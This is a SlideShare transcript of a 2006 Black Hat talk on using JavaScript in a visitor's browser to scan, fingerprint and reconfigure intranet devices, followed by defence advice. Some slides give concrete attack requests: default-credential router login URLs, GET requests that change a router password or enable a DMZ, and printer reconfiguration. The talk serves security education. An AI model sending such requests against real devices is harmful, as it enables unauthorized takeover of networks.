SlideShare uma empresa Scribd logo

Hacking Intranet Websites from the Outside

Jeremiah Grossman
Jeremiah Grossman

Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous" Imagine you’re visiting a popular website and invisible JavaScript exploit code steals your cookies, captures your keystrokes, and monitors every web page that you visit. Then, without your knowledge or consent, your web browser is silently hijacked to transfer out bank funds, hack other websites, or post derogatory comments in a public forum. No traces, no tracks, no warning sirens. In 2005’s "Phishing with Superbait" presentation we demonstrated that all these things were in fact possible using nothing more than some clever JavaScript. And as bad as things are already, further web application security research is revealing that outsiders can also use these hijacked browsers to exploit intranet websites. Most of us assume while surfing the Web that we are protected by firewalls and isolated through private NAT'ed IP addresses. We assume the soft security of intranet websites and that the Web-based interfaces of routers, firewalls, printers, IP phones, payroll systems, etc. even if left unpatched, remain safe inside the protected zone. We believe nothing is capable of directly connecting in from the outside world. Right? Well, not quite. Web browsers can be completely controlled by any web page, enabling them to become launching points to attack internal network resources. The web browser of every user on an enterprise network becomes a stepping stone for intruders. Now, imagine visiting a web page that contains JavaScript malware that automatically reconfigures your company’s routers or firewalls, from the inside, opening the internal network up to the whole world. Even worse, common Cross-Site Scripting vulnerabilities make it possible for these attacks to be launched from just about any website we visit and especially those we trust. The age of web application security malware has begun and it’s critical that understand what it is and how to defend against it. During this presentation we'll demonstrate a wide variety of cutting-edge web application security attack techniques and describe bestpractices for securing websites and users against these threats. You’ll see: Port scanning and attacking intranet devices using JavaScript Blind web server fingerprinting using unique URLs Discovery NAT'ed IP addresses with Java Applets Stealing web browser history with Cascading Style Sheets Best-practice defense measures for securing websites Essential habits for safe web surfing

Tecnologia
1 de 36
Baixar para ler offline
1 Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous" Black Hat (USA) - Las Vegas 08.03.2006 Jeremiah Grossman (Founder and CTO) T.C. Niedzialkowski (Sr. Security Engineer) Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
2 WhiteHat Security WhiteHat Sentinel - Continuous Vulnerability Assessment and Management Service for Websites. Jeremiah Grossman (Founder and CTO) ‣Technology R&D and industry evangelist ‣Co-founder of the Web Application Security Consortium (WASC) ‣Former Yahoo Information Security Officer T.C. Niedzialkowski (Sr. Security Engineer) ‣Manages WhiteHat Sentinel service for enterprise customers ‣extensive experience in web application security assessments ‣key contributor to the design of WhiteHat's scanning technology. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
3 Assumptions of Intranet Security Doing any of the following on the internet would be crazy, but on intranet... ‣Leaving hosts unpatched ‣Using default passwords ‣Not putting a firewall in front of a host Is OK because the perimeter firewalls block external access to internal devices. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
4 Assumptions of Intranet Security WRONG! Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
5 Everything is web-enabled routers, firewalls, printers, payroll systems, employee directories, bug tracking systems, development machines, web mail, wikis, IP phones, web cams, host management, etc etc. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
6 Intranet users have access To access intranet websites, control a user (or the browser) which is on the inside. FTP Intranet Wiki X Printer JavaScript HTTP X Malware User New Web X Server SSH Firewall NetBIOS Bug IP Phone Tracking Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
7 Hacking the Intranet JavaScript Malware Gets behind the firewall to attack the intranet. operating system and browser independent special thanks to... RSnake http://ha.ckers.org/ Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
8 The following examples DO NOT use any well-known or un-patched web browser vulnerabilities. The code uses clever and sophisticated JavaScript, Cascading Style-Sheet (CSS), and Java Applet programming. Technology that is common to all popular web browsers. Example code is developed for Firefox 1.5, but the techniques should also apply to Internet Explorer. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
9 Contracting JavaScript Malware 1.! ebsite owner embedded JavaScript malware. w 2.! eb page defaced with embedded JavaScript w malware. 3.! avaScript Malware injected into into a J public area of a website. (persistent XSS) 4. clicked on a specially-crafted link causing the website to echo JavaScript Malware. (non- persistent XSS) Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
10 Stealing Browser History JavaScript can make links and has access to CSS APIs See the difference? Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
11 Cycle through the most popular websites Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
12 NAT'ed IP Address IP Address Java Applet This applet demonstrates that any server you visit can find out your real IP address if you enable Java, even if you're behind a firewall or use a proxy. Lars Kindermann http://reglos.de/myaddress/ Send internal IP address where JavaScript can access it <APPLET CODE="MyAddress.class"> <PARAM NAME="URL" VALUE="demo.html?IP="> </APPLET> If we can get the internal subnet great, if not, we can still guess for port scanning... Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
13 JavaScript Port Scanning We can send HTTP requests to anywhere, but we can 't access the response (same-origin policy). So how do we know if a connection is made? <SCRIPT SRC=”http://192.168.1.100/”></SCRIPT> If a web server is listening on 192.168.1.100, HTML will be returned causing the JS interpreter to error. CAPTURE THE ERROR! Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
14 Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
15 Blind URL Fingerprinting There is a web server listening, but can 't see the response, what is it? Many web platforms have URL’s to images that are unique. Apache Web Server /icons/apache_pb.gif HP Printer /hp/device/hp_invent_logo.gif PHP Image Easter eggs /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 Use OnError! Cycle through unique URL’s using Image DOM objects <img src=”http://192.168.1.100/unique_image_url” onerror=”fingerprint()” /> If the onerror event does NOT execute, then it 's the associated platform. Technically, CSS and JavaScript pages can be used for fingerprinting as well. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
16 Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
17 DSL Wireless/Router Hacking Login, if not already authenticated Factory defaults are handy! http://admin:password@192.168.1.1/ Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
18 Change the password /password.cgi? POST to GET sysOldPasswd=password&sysNewPasswd=newpass&sysConfirmP asswd=newpass&cfAlert_Apply=Apply Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
19 DMZ Hacking /security.cgi? POST to GET dod=dod&dmz_enable=dmz_enable&dmzip1=192&dmzip2=168&d mzip3=1&dmzip4=9&wan_mtu=1500&apply=Apply&wan_way=1500 Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
20 Network Printer Hacking POST to GET /hp/device/set_config_deviceInfo.html?DeviceDescription=0WNED! &AssetNumber=&CompanyName=&ContactPerson=&Apply=Apply Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
21 Network Printer Hacking Auto-Fire Printer Test Pages POST to GET /hp/device/info_specialPages.html?Demo=Print Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
22 More Dirty Tricks ‣black hat search engine optimization (SEO) ‣Click-fraud ‣Distributed Denial of Service ‣Force access of illegal content ‣Hack other websites (IDS sirens) ‣Distributed email spam (Outlook Web Access) ‣Distributed blog spam ‣Vote tampering ‣De-Anonymize people ‣etc. Once the browser closes there is little trace of the exploit code. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
23 Anybody can be a victim on any website Trusted websites are hosting malware. Cross-Site Scripting (XSS) and Cross-Site Request Forgery vulnerabilities amplify the problem. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
24 XSS Everywhere Attacks the user of a website, not the website itself. The most common vulnerability. SecurityFocus cataloged over 1,400 issues. WhiteHat Security has Identified over 1,500 in custom web applications. 8 in 10 websites have XSS. Tops the Web Hacking Incident Database (WHID) http://www.webappsec.org/projects/whid/ Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
25 Exploited on popular websites Exploitation Leads to website defacement, session hi- jacking, user impersonation, worms, phishing scams, browser trojans, and more... Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
26 CSRF, even more widespread A cross-site request forgery (CSRF or XSRF), although similar-sounding in name to cross-site scripting (XSS), is a very different and almost opposite form of attack. Whereas cross-site scripting exploits the trust a user has in a website, a cross-site request forgery exploits the trust a website has in a user by forging the enactor and making a request appear to come from a trusted user. Wikipedia http://en.wikipedia.org/wiki/Cross-site_request_forgery No statistics, but the general consensus is just about every piece of sensitive website functionality is vulnerable. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
27 CSRF hack examples A story that diggs itself Users logged-in to digg.com visiting http:// 4diggers.blogspot.com/ will automatically digg the story http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/ Compromising your GMail contact list Contact list available in JavaScript space. <script src=http://mail.google.com/ mail/?_url_scrubbed> http://www.webappsec.org/lists/websecurity/archive/2006-01/msg00087.html Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
28 Worms MySpace (Samy Worm) - first XSS worm 24 hours, 1 million users affected ‣logged-in user views samys profile page, embedded JavaScript malware. ‣Malware ads samy as their friend, updates their profile with “samy is my hero”, and copies the malware to their profile. ‣People visiting infected profiles are in turn infected causing exponential growth. http://namb.la/popular/tech.html Yahoo Mail (JS-Yamanner) ‣User receives a email w/ an attachment embedded with JavaScript malware. ‣User opens the attachment and malware harvesting @yahoo.com and @yahoogroups.com addresses from contact list. CROSS-SITE SCRIPTING WORMS AND VIRUSES “The Impending Threat and the Best Defense” ‣User is re-directed to another web page. http://www.whitehatsec.com/downloads/ http://ha.ckers.org/blog/20060612/yahoo-xss-worm/ WHXSSThreats.pdf Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
29 Solutions How to protect yourself Or at least try Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
30 Not going to work Useful for other threats, but not against JavaScript malware. Patching and anti-virus Corporate Web Surfing Filters Security Sockets Layer (SSL) Two Factor Authentication Stay away from questionable websites Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
31 Better End-User Solutions ‣Be suspicious of long links, especially those that look like they contain HTML code. When in doubt, type the domain name manually into your browser location bar. ‣no web browser has a clear security Text advantage, but we prefer Firefox. For additional security, install browser add-ons such as NoScript (Firefox extension) or the Netcraft Toolbar. ‣When in doubt, disable JavaScript, Java, and Active X prior to your visit. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
32 We Need More Browser Security ‣Mozilla (Firefox), Microsoft and Opera development teams must begin formalizing and implementing Content-Restrictions. Sites would define and serve content restrictions for pages which contained untrusted content which they had filtered. If the filtering failed, the content restrictions Text may still prevent malicious script from executing or doing damage. Gervase Markham http://www.gerv.net/security/content-restrictions/ ‣Mozilla (Firefox) developers, please implement httpOnly. It's been around for years! Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
33 Fixing XSS and CSRF Preventing websites from hosting JavaScript Malware ‣rock solid Input Validation. This includes URL's, query strings, headers, post data, etc. filter HTML from output Text $data =~ s/(<|>|"|'|(|)|:)/'&#'.ord($1).';'/sge; or $data =~ s/([^w])/'&#'.ord($1).';'/sge; ‣Protect sensitive functionality from CSRF attack. Implement session tokens, CAPTCHAs and HTTP Referer checking. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
34 Finding and Fixing ‣Find your vulnerabilities before the bad guys do. Comprehensive assessments combine automated vulnerability scanning and expert-driven analysis. ‣When absolutely nothing can go wrong with Text your website, consider a web application firewall (WAF). Defense-in-Depth (mod_security, URL Scan, SecureIIS). ‣ harden the intranet websites. They are no longer out of reach. Patch and change default password. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
35 Recommended Reading Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
36 THANK YOU! Jeremiah Grossman Founder and Chief Technology Officer jeremiah@whitehatsec.com T.C. Niedzialkowski SR. Security Engineer tc@whitehatsec.com For more information about WhiteHat Security, please call 408.492.1817 or visit our website, www.whitehatsec.com Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.

Recomendados

Understanding bayes theorem
Understanding bayes theoremUnderstanding bayes theorem
Understanding bayes theoremDavid Siegel
 
Diseño de Corrales. Ganadería. Asi Ganadero
Diseño de Corrales. Ganadería. Asi Ganadero Diseño de Corrales. Ganadería. Asi Ganadero
Diseño de Corrales. Ganadería. Asi Ganadero Asi Ganadero
 
The world's most famous programmers
The world's most famous programmersThe world's most famous programmers
The world's most famous programmersArno Huetter
 
Theories on the Job & Your Future - A Message to Undergraduates
Theories on the Job & Your Future - A Message to UndergraduatesTheories on the Job & Your Future - A Message to Undergraduates
Theories on the Job & Your Future - A Message to UndergraduatesBrian Swanick
 
OHSU Chair's Conference March 2017
OHSU Chair's Conference March 2017OHSU Chair's Conference March 2017
OHSU Chair's Conference March 2017Ryan Radecki
 
Travailler en réseau intelligence collective
Travailler en réseau intelligence collectiveTravailler en réseau intelligence collective
Travailler en réseau intelligence collectiveRobert de Quelen
 
ELSA France "Teaching is us!"
ELSA France "Teaching is us!" ELSA France "Teaching is us!"
ELSA France "Teaching is us!" Adrian Scarlett
 
Culture
CultureCulture
CultureReed Hastings
 

Recomendados

Understanding bayes theorem
Understanding bayes theoremUnderstanding bayes theorem
Understanding bayes theoremDavid Siegel
 
Diseño de Corrales. Ganadería. Asi Ganadero
Diseño de Corrales. Ganadería. Asi Ganadero Diseño de Corrales. Ganadería. Asi Ganadero
Diseño de Corrales. Ganadería. Asi Ganadero Asi Ganadero
 
The world's most famous programmers
The world's most famous programmersThe world's most famous programmers
The world's most famous programmersArno Huetter
 
Theories on the Job & Your Future - A Message to Undergraduates
Theories on the Job & Your Future - A Message to UndergraduatesTheories on the Job & Your Future - A Message to Undergraduates
Theories on the Job & Your Future - A Message to UndergraduatesBrian Swanick
 
OHSU Chair's Conference March 2017
OHSU Chair's Conference March 2017OHSU Chair's Conference March 2017
OHSU Chair's Conference March 2017Ryan Radecki
 
Travailler en réseau intelligence collective
Travailler en réseau intelligence collectiveTravailler en réseau intelligence collective
Travailler en réseau intelligence collectiveRobert de Quelen
 
ELSA France "Teaching is us!"
ELSA France "Teaching is us!" ELSA France "Teaching is us!"
ELSA France "Teaching is us!" Adrian Scarlett
 
Culture
CultureCulture
CultureReed Hastings
 
TEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of WorkTEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of WorkVolker Hirsch
 
Med vi
Med viMed vi
Med viPaty Rodríguez
 
Gold Contact Snap-Action Switches
Gold Contact Snap-Action SwitchesGold Contact Snap-Action Switches
Gold Contact Snap-Action SwitchesDwyer Instruments
 
Exploring the Next Generation Digital Learning Environment with Tsugi
Exploring the Next Generation Digital Learning Environment with TsugiExploring the Next Generation Digital Learning Environment with Tsugi
Exploring the Next Generation Digital Learning Environment with TsugiCharles Severance
 
Mobile learning
Mobile learningMobile learning
Mobile learningRaymond Marquina
 
народные промыслы и ремёсла донбасса
народные промыслы и ремёсла донбассанародные промыслы и ремёсла донбасса
народные промыслы и ремёсла донбассаШахтерская ОШ 19
 
Cassandra 3.0 - JSON at scale - StampedeCon 2015
Cassandra 3.0 - JSON at scale - StampedeCon 2015Cassandra 3.0 - JSON at scale - StampedeCon 2015
Cassandra 3.0 - JSON at scale - StampedeCon 2015StampedeCon
 
Afghan media analysis Jan 2017
Afghan media analysis Jan 2017Afghan media analysis Jan 2017
Afghan media analysis Jan 2017PakistanAdvertisersSociety
 
CTF for ビギナーズ バイナリ講習資料
CTF for ビギナーズ バイナリ講習資料CTF for ビギナーズ バイナリ講習資料
CTF for ビギナーズ バイナリ講習資料SECCON Beginners
 
170301 いまさら聞けないブロックチェーン①
170301 いまさら聞けないブロックチェーン①170301 いまさら聞けないブロックチェーン①
170301 いまさら聞けないブロックチェーン①勇太 荒瀬
 
التمارين المحلولة لكتاب الرسم الهندسي 1 - copy
التمارين المحلولة لكتاب الرسم الهندسي 1 - copyالتمارين المحلولة لكتاب الرسم الهندسي 1 - copy
التمارين المحلولة لكتاب الرسم الهندسي 1 - copyelsayedelsman
 
All of the Performance Tuning Features in Oracle SQL Developer
All of the Performance Tuning Features in Oracle SQL DeveloperAll of the Performance Tuning Features in Oracle SQL Developer
All of the Performance Tuning Features in Oracle SQL DeveloperJeff Smith
 
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...G3 Communications
 
Rood’s Approach
Rood’s ApproachRood’s Approach
Rood’s Approachmsrpt
 
Global Education Futures: Vision Summary
Global Education Futures: Vision SummaryGlobal Education Futures: Vision Summary
Global Education Futures: Vision SummaryPavel Luksha
 
All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterJeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryJeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideJeremiah Grossman
 

Mais conteúdo relacionado

Destaque

TEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of WorkTEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of WorkVolker Hirsch
 
Gold Contact Snap-Action Switches
Gold Contact Snap-Action SwitchesGold Contact Snap-Action Switches
Gold Contact Snap-Action SwitchesDwyer Instruments
 
Exploring the Next Generation Digital Learning Environment with Tsugi
Exploring the Next Generation Digital Learning Environment with TsugiExploring the Next Generation Digital Learning Environment with Tsugi
Exploring the Next Generation Digital Learning Environment with TsugiCharles Severance
 
народные промыслы и ремёсла донбасса
народные промыслы и ремёсла донбассанародные промыслы и ремёсла донбасса
народные промыслы и ремёсла донбассаШахтерская ОШ 19
 
Cassandra 3.0 - JSON at scale - StampedeCon 2015
Cassandra 3.0 - JSON at scale - StampedeCon 2015Cassandra 3.0 - JSON at scale - StampedeCon 2015
Cassandra 3.0 - JSON at scale - StampedeCon 2015StampedeCon
 
CTF for ビギナーズ バイナリ講習資料
CTF for ビギナーズ バイナリ講習資料CTF for ビギナーズ バイナリ講習資料
CTF for ビギナーズ バイナリ講習資料SECCON Beginners
 
170301 いまさら聞けないブロックチェーン①
170301 いまさら聞けないブロックチェーン①170301 いまさら聞けないブロックチェーン①
170301 いまさら聞けないブロックチェーン①勇太 荒瀬
 
التمارين المحلولة لكتاب الرسم الهندسي 1 - copy
التمارين المحلولة لكتاب الرسم الهندسي 1 - copyالتمارين المحلولة لكتاب الرسم الهندسي 1 - copy
التمارين المحلولة لكتاب الرسم الهندسي 1 - copyelsayedelsman
 
All of the Performance Tuning Features in Oracle SQL Developer
All of the Performance Tuning Features in Oracle SQL DeveloperAll of the Performance Tuning Features in Oracle SQL Developer
All of the Performance Tuning Features in Oracle SQL DeveloperJeff Smith
 
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...G3 Communications
 
Rood’s Approach
Rood’s ApproachRood’s Approach
Rood’s Approachmsrpt
 
Global Education Futures: Vision Summary
Global Education Futures: Vision SummaryGlobal Education Futures: Vision Summary
Global Education Futures: Vision SummaryPavel Luksha
 

Destaque (15)

TEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of WorkTEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of Work
 
Med vi
Med viMed vi
Med vi
 
Gold Contact Snap-Action Switches
Gold Contact Snap-Action SwitchesGold Contact Snap-Action Switches
Gold Contact Snap-Action Switches
 
Exploring the Next Generation Digital Learning Environment with Tsugi
Exploring the Next Generation Digital Learning Environment with TsugiExploring the Next Generation Digital Learning Environment with Tsugi
Exploring the Next Generation Digital Learning Environment with Tsugi
 
Mobile learning
Mobile learningMobile learning
Mobile learning
 
народные промыслы и ремёсла донбасса
народные промыслы и ремёсла донбассанародные промыслы и ремёсла донбасса
народные промыслы и ремёсла донбасса
 
Cassandra 3.0 - JSON at scale - StampedeCon 2015
Cassandra 3.0 - JSON at scale - StampedeCon 2015Cassandra 3.0 - JSON at scale - StampedeCon 2015
Cassandra 3.0 - JSON at scale - StampedeCon 2015
 
Afghan media analysis Jan 2017
Afghan media analysis Jan 2017Afghan media analysis Jan 2017
Afghan media analysis Jan 2017
 
CTF for ビギナーズ バイナリ講習資料
CTF for ビギナーズ バイナリ講習資料CTF for ビギナーズ バイナリ講習資料
CTF for ビギナーズ バイナリ講習資料
 
170301 いまさら聞けないブロックチェーン①
170301 いまさら聞けないブロックチェーン①170301 いまさら聞けないブロックチェーン①
170301 いまさら聞けないブロックチェーン①
 
التمارين المحلولة لكتاب الرسم الهندسي 1 - copy
التمارين المحلولة لكتاب الرسم الهندسي 1 - copyالتمارين المحلولة لكتاب الرسم الهندسي 1 - copy
التمارين المحلولة لكتاب الرسم الهندسي 1 - copy
 
All of the Performance Tuning Features in Oracle SQL Developer
All of the Performance Tuning Features in Oracle SQL DeveloperAll of the Performance Tuning Features in Oracle SQL Developer
All of the Performance Tuning Features in Oracle SQL Developer
 
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...
Get Over It...Your Customers Don’t Care About You: Lenovo’s Intent- Driven Di...
 
Rood’s Approach
Rood’s ApproachRood’s Approach
Rood’s Approach
 
Global Education Futures: Vision Summary
Global Education Futures: Vision SummaryGlobal Education Futures: Vision Summary
Global Education Futures: Vision Summary
 

Mais de Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterJeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryJeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideJeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedJeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportJeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)Jeremiah Grossman
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 

Mais de Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
